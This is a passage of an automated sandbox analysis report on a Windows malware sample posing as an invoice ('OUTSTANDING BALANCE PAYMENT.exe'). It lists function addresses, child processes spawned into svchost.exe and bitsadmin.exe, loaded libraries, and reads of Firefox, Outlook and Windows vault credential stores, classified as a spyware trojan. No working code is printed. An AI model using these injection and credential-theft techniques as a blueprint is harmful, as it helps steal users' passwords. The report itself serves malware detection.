                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_01228DF80_2_01228DF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189932_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ACB2_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0B32_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F02_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A902_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3D32_2_0040E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B8E2_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B932_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C402_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C3A2_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E51C2_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5232_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E492_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E502_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F192_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027202_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: String function: 002A6AC0 appears 42 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: String function: 002AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: String function: 0029EC2F appears 68 times
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003D03000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OUTSTANDING BALANCE PAYMENT.exe
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144291717.0000000003EAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OUTSTANDING BALANCE PAYMENT.exe
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CCE7A GetLastError,FormatMessageW,0_2_002CCE7A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002BAB84 AdjustTokenPrivileges,CloseHandle,0_2_002BAB84
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002BB134
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002CE1FD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_002C6532
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_002DC18C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0028406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0028406B
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeFile created: C:\Users\user\AppData\Local\Temp\aut21DB.tmpJump to behavior
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003196000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4594142282.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4594142282.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2578911012.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2582758695.00000000031C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OUTSTANDING BALANCE PAYMENT.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"Jump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic file information: File size 1213952 > 1048576
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QvLFrfAuvuCLc.exe, 00000004.00000000.2302797977.000000000091E000.00000002.00000001.01000000.00000005.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000000.2455000791.000000000091E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029E01E LoadLibraryA,GetProcAddress,0_2_0029E01E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029288B push 66002923h; retn 002Fh0_2_002928E1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A6B05 push ecx; ret 0_2_002A6B18
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0122952F push edx; retf 0_2_01229530
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402055 push edx; iretd 2_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018A1 push edx; iretd 2_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414930 push eax; retf 2_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181E4 push ds; retf 2_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040218B push ebp; iretd 2_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D9B6 push FFFFFFEBh; iretd 2_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AA30 push edx; retf 2_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004192F1 push edx; ret 2_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425433 push edi; ret 2_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414658 push esp; ret 2_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414E8B pushfd ; iretd 2_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A7C3 push edi; ret 2_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D7CA push ecx; ret 2_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
